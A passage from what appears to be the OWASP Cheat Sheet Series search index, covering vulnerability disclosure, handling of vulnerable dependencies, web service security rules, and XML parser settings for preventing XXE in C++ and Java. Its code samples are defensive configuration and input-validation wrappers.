"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#disclosure","title":"Disclosure","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#commercial-and-open-source-software","title":"Commercial and Open Source Software","text":"

Once the vulnerability has been resolved (and retested), the details should be published in a security advisory for the software. It is important to remember that publishing the details of security issues does not make the vendor look bad. All software has security vulnerabilities, and demonstrating a clear and established process for handling and disclosing them gives far more confidence in the security of the software than trying to hide the issues.

At a minimum, the security advisory must contain:

Where possible it is also good to include:

Security advisories should be easy for developers and system administrators to find. Common ways to publish them include:

Some researchers may publish their own technical write ups of the vulnerability, which will usually include the full details required to exploit it (and sometimes even working exploit code). For more serious vulnerabilities, it may be sensible to ask the researcher to delay publishing the full details for a period of time (such as a week), in order to give system administrators more time to install the patches before exploit code is available. However, once the patch has been releases, attackers will be able to reverse engineer the vulnerability and develop their own exploit code, so there is limited value to delaying the full release.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-systems","title":"Private Systems","text":"

For vulnerabilities in private systems, a decision needs to be made about whether the details should be published once the vulnerability has been resolved. Most bug bounty programs give organisations the option about whether to disclose the details once the issue has been resolved, although it is not typically required.

Publishing these details helps to demonstrate that the organisation is taking proactive and transparent approach to security, but can also result in potentially embarrassing omissions and misconfigurations being made public. In the event of a future compromise or data breach, they could also potentially be used as evidence of a weak security culture within the organisation. Additionally, they may expose technical details about internal, and could help attackers identify other similar issues. As such, this decision should be carefully evaluated, and it may be wise to take legal advice.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#rewarding-researchers","title":"Rewarding Researchers","text":"

Where researchers have identified and reported vulnerabilities outside of a bug bounty program (essentially providing free security testing), and have acted professionally and helpfully throughout the vulnerability disclosure process, it is good to offer them some kind of reward to encourage this kind of positive interaction in future. If monetary rewards are not possible then a number of other options should be considered, such as:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html","title":"Vulnerable Dependency Management Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of the cheat sheet is to provide a proposal of approach regarding the handling of vulnerable third-party dependencies when they are detected, and this, depending on different situation.

The cheat sheet is not tools oriented but it contains a tools section informing the reader about free and commercial solutions that can be used to detect vulnerable dependencies, depending on the level of support on the technologies at hand

Note:

Proposals mentioned in this cheat sheet are not silver-bullet (recipes that work in all situations) yet can be used as a foundation and adapted to your context.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context","title":"Context","text":"

Most of the projects use third-party dependencies to delegate handling of different kind of operations, e.g. generation of document in a specific format, HTTP communications, data parsing of a specific format, etc.

It's a good approach because it allows the development team to focus on the real application code supporting the expected business feature. The dependency brings forth an expected downside where the security posture of the real application is now resting on it.

This aspect is referenced in the following projects:

Based on this context, it's important for a project to ensure that all the third-party dependencies implemented are clean of any security issue, and if they happen to contain any security issues, the development team needs to be aware of it and apply the required mitigation measures to secure the affected application.

It's highly recommended to perform automated analysis of the dependencies from the birth of the project. Indeed, if this task is added at the middle or end of the project, it can imply a huge amount of work to handle all the issues identified and that will in turn impose a huge burden on the development team and might to blocking the advancement of the project at hand.

Note:

In the rest of the cheat sheet, when we refer to development team then we assume that the team contains a member with the required application security skills or can refer to someone in the company having these kind of skills to analyse the vulnerability impacting the dependency.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-detection","title":"Remark about the detection","text":"

It's important to keep in mind the different ways in which a security issue is handled after its discovery.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#1-responsible-disclosure","title":"1. Responsible disclosure","text":"

See a description here.

A researcher discovers a vulnerability in a component, and after collaboration with the component provider, they issue a CVE (sometimes a specific vulnerability identifier to the provider is created but generally a CVE identifier is preferred) associated to the issue allowing the public referencing of the issue as well as the available fixation/mitigation.

If in case the provider doesn't properly cooperate with the researcher, the following results are expected:

Here, the vulnerability is always referenced in the CVE global database used, generally, by the detection tools as one of the several input sources used.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#2-full-disclosure","title":"2. Full disclosure","text":"

See a description here, into the section named Computers about Computer Security.

The researcher decides to release all the information including exploitation code/method on services like Full Disclosure mailing list, Exploit-DB.

Here a CVE is not always created then the vulnerability is not always in the CVE global database causing the detection tools to be potentially blind about unless the tools use other input sources.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-security-issue-handling-decision","title":"Remark about the security issue handling decision","text":"

When a security issue is detected, it's possible to decide to accept the risk represented by the security issue. However, this decision must be taken by the Chief Risk Officer (fallback possible to Chief Information Security Officer) of the company based on technical feedback from the development team that have analyzed the issue (see the Cases section) as well as the CVEs CVSS score indicators.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#cases","title":"Cases","text":"

When a security issue is detected, the development team can meet one of the situations (named Case in the rest of the cheat sheet) presented in the sub sections below.

If the vulnerably impact a transitive dependency then the action will be taken on the direct dependency of the project because acting on a transitive dependency often impact the stability of the application.

Acting on a on a transitive dependency require the development team to fully understand the complete relation/communication/usage from the project first level dependency until the dependency impacted by the security vulnerability, this task is very time consuming.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-1","title":"Case 1","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_1","title":"Context","text":"

Patched version of the component has been released by the provider.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach","title":"Ideal condition of application of the approach","text":"

Set of automated unit or integration or functional or security tests exist for the features of the application using the impacted dependency allowing to validate that the feature is operational.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach","title":"Approach","text":"

Step 1:

Update the version of the dependency in the project on a testing environment.

Step 2:

Prior to running the tests, 2 output paths are possible:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-2","title":"Case 2","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_2","title":"Context","text":"

Provider informs the team that it will take a while to fix the issue and, so, a patched version will not be available before months.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_1","title":"Ideal condition of application of the approach","text":"

Provider can share any of the below with the development team:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_1","title":"Approach","text":"

Step 1:

If a workaround is provided, it should be applied and validated on the testing environment, and thereafter deployed to production.

If the provider has given the team a list of the impacted functions, protective code must wrap the calls to these functions to ensure that the input and the output data is safe.

Moreover, security devices, such as the Web Application Firewall (WAF), can handle such issues by protecting the internal applications through parameter validation and by generating detection rules for those specific libraries. Yet, in this cheat sheet, the focus is set on the application level in order to patch the vulnerability as close as possible to the source.

Example using java code in which the impacted function suffers from a Remote Code Execution issue:

public void callFunctionWithRCEIssue(String externalInput){\n//Apply input validation on the external input using regex\nif(Pattern.matches(\"[a-zA-Z0-9]{1,50}\", externalInput)){\n//Call the flawed function using safe input\nfunctionWithRCEIssue(externalInput);\n}else{\n//Log the detection of exploitation\nSecurityLogger.warn(\"Exploitation of the RCE issue XXXXX detected !\");\n//Raise an exception leading to a generic error send to the client...\n}\n}\n

If the provider has provided nothing about the vulnerability, Case 3 can be applied skipping the step 2 of this case. We assume here that, at least, the CVE has been provided.

Step 2:

If the provider has provided the team with the exploitation code, and the team made a security wrapper around the vulnerable library/code, execute the exploitation code in order to ensure that the library is now secure and doesn't affect the application.

If you have a set of automated unit or integration or functional or security tests that exist for the application, run them to verify that the protection code added does not impact the stability of the application.

Add a comment in the project README explaining that the issue (specify the related CVE) is handled during the waiting time of a patched version because the detection tool will continue to raise an alert on this dependency.

Note: You can add the dependency to the ignore list but the ignore scope for this dependency must only cover the CVE related to the vulnerability because a dependency can be impacted by several vulnerabilities having each one its own CVE.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-3","title":"Case 3","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_3","title":"Context","text":"

Provider informs the team that they cannot fix the issue, so no patched version will be released at all (applies also if provider does not want to fix the issue or does not answer at all).

In this case the only information given to the development team is the CVE.

Notes:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_2","title":"Ideal condition of application of the approach","text":"

Nothing specific because here we are in a patch yourself condition.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_2","title":"Approach","text":"

Step 1:

If we are in this case due to one of the following conditions, it's a good idea to start a parallel study to find another component better maintained or if it's a commercial component with support then put pressure on the provider with the help of your Chief Risk Officer (fallback possible to Chief Information Security Officer):

In all cases, here, we need to handle the vulnerability right now.

Step 2:

As we know the vulnerable dependency, we know where it is used in the application (if it's a transitive dependency then we can identify the first level dependency using it using the IDE built-in feature or the dependency management system used (Maven, Gradle, NuGet, npm, etc.). Note that IDE is also used to identify the calls to the dependency.

Identifying calls to this dependency is fine but it is the first step. The team still lacks information on what kind of patching needs to be performed.

To obtain these information, the team uses the CVE content to know which kind of vulnerability affects the dependency. The description property provides the answer: SQL injection, Remote Code Execution, Cross-Site Scripting, Cross-Site Request Forgery, etc.

After identifying the above 2 points, the team is aware of the type of patching that needs to be taken (Case 2 with the protective code) and where to add it.

Example:

The team has an application using the Jackson API in a version exposed to the CVE-2016-3720.

The description of the CVE is as follows:

XML external entity (XXE) vulnerability in XmlMapper in the Data format extension for Jackson\n(aka jackson-dataformat-xml) allows attackers to have unspecified impact via unknown vectors.\n

Based on these information, the team determines that the necessary patching will be to add a pre-validation of any XML data passed to the Jakson API to prevent XML external entity (XXE) vulnerability.

Step 3:

If possible, create a unit test that mimics the vulnerability in order to ensure that the patch is effective and have a way to continuously ensure that the patch is in place during the evolution of the project.

If you have a set of automated unit or integration or functional or security tests that exists for the application then run them to verify that the patch does not impact the stability of the application.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-4","title":"Case 4","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_4","title":"Context","text":"

The vulnerable dependency is found during one of the following situation in which the provider is not aware of the vulnerability:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_3","title":"Ideal condition of application of the approach","text":"

Provider collaborates with you after being notified of the vulnerability.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_3","title":"Approach","text":"

Step 1:

Inform the provider about the vulnerability by sharing the post with them.

Step 2:

Using the information from the full disclosure post or the pentester's exploitation feedback, if the provider collaborates then apply Case 2, otherwise apply Case 3, and instead of analyzing the CVE information, the team needs to analyze the information from the full disclosure post/pentester's exploitation feedback.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#tools","title":"Tools","text":"

This section lists several tools that can used to analyse the dependencies used by a project in order to detect the vulnerabilities.

It's important to ensure, during the selection process of a vulnerable dependency detection tool, that this one:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html","title":"Web Service Security Cheat Sheet","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing guidance for securing web services and preventing web services related attacks.

Please notice that due to the difference in implementation between different frameworks, this cheat sheet is kept at a high level.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-confidentiality","title":"Transport Confidentiality","text":"

Transport confidentiality protects against eavesdropping and man-in-the-middle attacks against web service communications to/from the server.

Rule: All communication with and between web services containing sensitive features, an authenticated session, or transfer of sensitive data must be encrypted using well-configured TLS. This is recommended even if the messages themselves are encrypted because TLS provides numerous benefits beyond traffic confidentiality including integrity protection, replay defenses, and server authentication. For more information on how to do this properly see the Transport Layer Protection Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#server-authentication","title":"Server Authentication","text":"

Rule: TLS must be used to authenticate the service provider to the service consumer. The service consumer should verify the server certificate is issued by a trusted provider, is not expired, is not revoked, matches the domain name of the service, and that the server has proven that it has the private key associated with the public key certificate (by properly signing something or successfully decrypting something encrypted with the associated public key).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#user-authentication","title":"User Authentication","text":"

User authentication verifies the identity of the user or the system trying to connect to the service. Such authentication is usually a function of the container of the web service.

Rule: If used, Basic Authentication must be conducted over TLS, but Basic Authentication is not recommended because it discloses secrets in plan text (base64 encoded) in HTTP Headers.

Rule: Client Certificate Authentication using Mutual-TLS is a common form of authentication that is recommended where appropriate. See: Authentication Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-encoding","title":"Transport Encoding","text":"

SOAP encoding styles are meant to move data between software objects into XML format and back again.

Rule: Enforce the same encoding style between the client and the server.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-integrity","title":"Message Integrity","text":"

This is for data at rest. The integrity of data in transit can easily be provided by TLS.

When using public key cryptography, encryption does guarantee confidentiality but it does not guarantee integrity since the receiver's public key is public. For the same reason, encryption does not ensure the identity of the sender.

Rule: For XML data, use XML digital signatures to provide message integrity using the sender's private key. This signature can be validated by the recipient using the sender's digital certificate (public key).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-confidentiality","title":"Message Confidentiality","text":"

Data elements meant to be kept confidential must be encrypted using a strong encryption cipher with an adequate key length to deter brute-forcing.

Rule: Messages containing sensitive data must be encrypted using a strong encryption cipher. This could be transport encryption or message encryption.

Rule: Messages containing sensitive data that must remain encrypted at rest after receipt must be encrypted with strong data encryption, not just transport encryption.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#authorization","title":"Authorization","text":"

Web services need to authorize web service clients the same way web applications authorize users. A web service needs to make sure a web service client is authorized to perform a certain action (coarse-grained) on the requested data (fine-grained).

Rule: A web service should authorize its clients whether they have access to the method in question. Following an authentication challenge, the web service should check the privileges of the requesting entity whether they have access to the requested resource. This should be done on every request, and a challenge-response Authorization mechanism added to sensitive resources like password changes, primary contact details such as email, physical address, payment or delivery instructions.

Rule: Ensure access to administration and management functions within the Web Service Application is limited to web service administrators. Ideally, any administrative capabilities would be in an application that is completely separate from the web services being managed by these capabilities, thus completely separating normal users from these sensitive functions.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#schema-validation","title":"Schema Validation","text":"

Schema validation enforces constraints and syntax defined by the schema.

Rule: Web services must validate SOAP payloads against their associated XML schema definition (XSD).

Rule: The XSD defined for a SOAP web service should, at a minimum, define the maximum length and character set of every parameter allowed to pass into and out of the web service.

Rule: The XSD defined for a SOAP web service should define strong (ideally allow-list) validation patterns for all fixed format parameters (e.g., zip codes, phone numbers, list values, etc.).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#content-validation","title":"Content Validation","text":"

Rule: Like any web application, web services need to validate input before consuming it. Content validation for XML input should include:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Web services need to ensure that the output sent to clients is encoded to be consumed as data and not as scripts. This gets pretty important when web service clients use the output to render HTML pages either directly or indirectly using AJAX objects.

Rule: All the rules of output encoding applies as per Cross Site Scripting Prevention Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#virus-protection","title":"Virus Protection","text":"

SOAP provides the ability to attach files and documents to SOAP messages. This gives the opportunity for hackers to attach viruses and malware to these SOAP messages.

Rule: Ensure Virus Scanning technology is installed and preferably inline so files and attachments could be checked before being saved on disk.

Rule: Ensure Virus Scanning technology is regularly updated with the latest virus definitions/rules.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-size","title":"Message Size","text":"

Web services like web applications could be a target for DOS attacks by automatically sending the web services thousands of large size SOAP messages. This either cripples the application making it unable to respond to legitimate messages or it could take it down entirely.

Rule: SOAP Messages size should be limited to an appropriate size limit. Larger size limit (or no limit at all) increases the chances of a successful DoS attack.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#availability","title":"Availability","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#resources-limiting","title":"Resources Limiting","text":"

During regular operation, web services require computational power such as CPU cycles and memory. Due to malfunctioning or while under attack, a web service may required too much resources, leaving the host system unstable.

Rule: Limit the amount of CPU cycles the web service can use based on expected service rate, in order to have a stable system.

Rule: Limit the amount of memory the web service can use to avoid system running out of memory. In some cases the host system may start killing processes to free up memory.

Rule: Limit the number of simultaneous open files, network connections and started processes.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-throughput","title":"Message Throughput","text":"

Throughput represents the number of web service requests served during a specific amount of time.

Rule: Configuration should be optimized for maximum message throughput to avoid running into DoS-like situations.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#xml-denial-of-service-protection","title":"XML Denial of Service Protection","text":"

XML Denial of Service is probably the most serious attack against web services. So the web service must provide the following validation:

Rule: Validation against recursive payloads.

Rule: Validation against oversized payloads.

Rule: Protection against XML entity expansion.

Rule: Validating against overlong element names. If you are working with SOAP-based Web Services, the element names are those SOAP Actions.

This protection should be provided by your XML parser/schema validator. To verify, build test cases to make sure your parser to resistant to these types of attacks.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#endpoint-security-profile","title":"Endpoint Security Profile","text":"

Rule: Web services must be compliant with Web Services-Interoperability (WS-I) Basic Profile at minimum.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html","title":"XML External Entity Prevention Cheat Sheet","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

XML eXternal Entity injection (XXE), which is now part of the OWASP Top 10 via the point A4, is a type of attack against an application that parses XML input.

XXE issue is referenced under the ID 611 in the Common Weakness Enumeration referential.

This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser.

This attack may lead to the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning from the perspective of the machine where the parser is located, and other system impacts. The following guide provides concise information to prevent this vulnerability.

For more information on XXE, please visit XML External Entity (XXE).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#general-guidance","title":"General Guidance","text":"

The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:

factory.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n

Disabling DTDs also makes the parser secure against denial of services (DOS) attacks such as Billion Laughs. If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that's specific to each parser.

Detailed XXE Prevention guidance for a number of languages and commonly used XML parsers in those languages is provided below.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#cc","title":"C/C++","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2","title":"libxml2","text":"

The Enum xmlParserOption should not have the following options defined:

Note:

Per: According to this post, starting with libxml2 version 2.9, XXE has been disabled by default as committed by the following patch.

Search for the usage of the following APIs to ensure there is no XML_PARSE_NOENT and XML_PARSE_DTDLOAD defined in the parameters:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxerces-c","title":"libxerces-c","text":"

Use of XercesDOMParser do this to prevent XXE:

XercesDOMParser *parser = new XercesDOMParser;\nparser->setCreateEntityReferenceNodes(true);\nparser->setDisableDefaultEntityResolution(true);\n

Use of SAXParser, do this to prevent XXE:

SAXParser* parser = new SAXParser;\nparser->setDisableDefaultEntityResolution(true);\n

Use of SAX2XMLReader, do this to prevent XXE:

SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();\nparser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java","title":"Java","text":"

Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use. The following describes how to disable XXE in the most commonly used XML parsers for Java.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j","title":"JAXP DocumentBuilderFactory, SAXParserFactory and DOM4J","text":"

DocumentBuilderFactory, SAXParserFactory and DOM4J XML Parsers can be configured using the same techniques to protect them against XXE.

Only the DocumentBuilderFactory example is presented here. The JAXP DocumentBuilderFactory setFeature method allows a developer to control which implementation-specific XML processor features are enabled or disabled.

The features can either be set on the factory or the underlying XMLReader setFeature method.

Each XML processor implementation has its own features that govern how DTDs and external entities are processed. By disabling DTD processing entirely, most XXE attacks can be averted, although it is also necessary to disable or verify that XInclude is not enabled.

Since the JDK 6, the flag FEATURE_SECURE_PROCESSING can be used to instruct the implementation of the parser to process XML securely. Its behaviour is implementation dependent. Even if it can help tackling resource exhaustion, it may not always mitigate entity expansion. More details on this flag can be found here.

For a syntax highlighted example code snippet using SAXParserFactory, look here. Example code disabling DTDs (doctypes) altogether:

import javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {\n// This is the PRIMARY defense. If DTDs (doctypes) are disallowed, almost all\n// XML entity attacks are prevented\n// Xerces 2 only - http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl\nFEATURE = \"http://apache.org/xml/features/disallow-doctype-decl\";\ndbf.setFeature(FEATURE, true);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using a XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

If you can't completely disable DTDs:

import javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {    // If you can't completely disable DTDs, then at least do the following:\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities\n// JDK7+ - http://xml.org/sax/features/external-general-entities\n//This feature has to be used together with the following one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-general-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities\n// JDK7+ - http://xml.org/sax/features/external-parameter-entities\n//This feature has to be used together with the previous one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-parameter-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Disable external DTDs as well\nFEATURE = \"http://apache.org/xml/features/nonvalidating/load-external-dtd\";\ndbf.setFeature(FEATURE, false);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\ndbf.setExpandEntityReferences(false);\n\n// As stated in the documentation \"Feature for Secure Processing (FSP)\" is the central mechanism to \n// help safeguard XML processing. It instructs XML processors, such as parsers, validators, \n// and transformers, to try and process XML securely. This can be used as an alternative to\n// dbf.setExpandEntityReferences(false); to allow some safe level of Entity Expansion\n// Exists from JDK6.\ndbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\n\n\n// And, per Timothy Morgan: \"If for some reason support for inline DOCTYPEs are a requirement, then\n// ensure the entity settings are disabled (as shown above) and beware that SSRF attacks\n// (http://cwe.mitre.org/data/definitions/918.html) and denial\n// of service attacks (such as billion laughs or decompression bombs via \"jar:\") are a risk.\"\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is probably not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using a XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

Xerces 1 Features:

Xerces 2 Features:

Note: The above defenses require Java 7 update 67, Java 8 update 20, or above, because the above countermeasures for DocumentBuilderFactory and SAXParserFactory are broken in earlier Java versions, per: CVE-2014-6517.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory-a-stax-parser","title":"XMLInputFactory (a StAX parser)","text":"

StAX parsers such as XMLInputFactory allow various properties and features to be set.

To protect a Java XMLInputFactory from XXE, disable DTDs (doctypes) altogether:

// This disables DTDs entirely for that factory\nxmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);\n

or if you can't completely disable DTDs:

// This causes XMLStreamException to be thrown if external DTDs are accessed.\nxmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\n// disable external entities\nxmlInputFactory.setProperty(\"javax.xml.stream.isSupportingExternalEntities\", false);\n

The setting xmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\"); is not required, as XMLInputFactory is dependent on Validator to perform XML validation against Schemas. Check the Validator section for the specific configuration.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#oracle-dom-parser","title":"Oracle DOM Parser","text":"

Follow Oracle recommendation e.g.:

    // Extend oracle.xml.parser.v2.XMLParser\nDOMParser domParser = new DOMParser();\n\n// Do not expand entity references\ndomParser.setAttribute(DOMParser.EXPAND_ENTITYREF, false);\n\n// dtdObj is an instance of oracle.xml.parser.v2.DTD\ndomParser.setAttribute(DOMParser.DTD_OBJECT, dtdObj);\n\n// Do not allow more than 11 levels of entity expansion\ndomParser.setAttribute(DOMParser.ENTITY_EXPANSION_DEPTH, 12);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory","title":"TransformerFactory","text":"

To protect a javax.xml.transform.TransformerFactory from XXE, do this:

TransformerFactory tf = TransformerFactory.newInstance();\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator","title":"Validator","text":"

To protect a javax.xml.validation.Validator from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nSchema schema = factory.newSchema();\nValidator validator = schema.newValidator();\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#schemafactory","title":"SchemaFactory","text":"

To protect a javax.xml.validation.SchemaFactory from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nSchema schema = factory.newSchema(Source);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxtransformerfactory","title":"SAXTransformerFactory","text":"

To protect a javax.xml.transform.sax.SAXTransformerFactory from XXE, do this:

SAXTransformerFactory sf = SAXTransformerFactory.newInstance();\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\nsf.newXMLFilter(Source);\n

Note: Use of the following XMLConstants requires JAXP 1.5, which was added to Java in 7u40 and Java 8:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader","title":"XMLReader","text":"

To protect a Java org.xml.sax.XMLReader from XXE, do this:

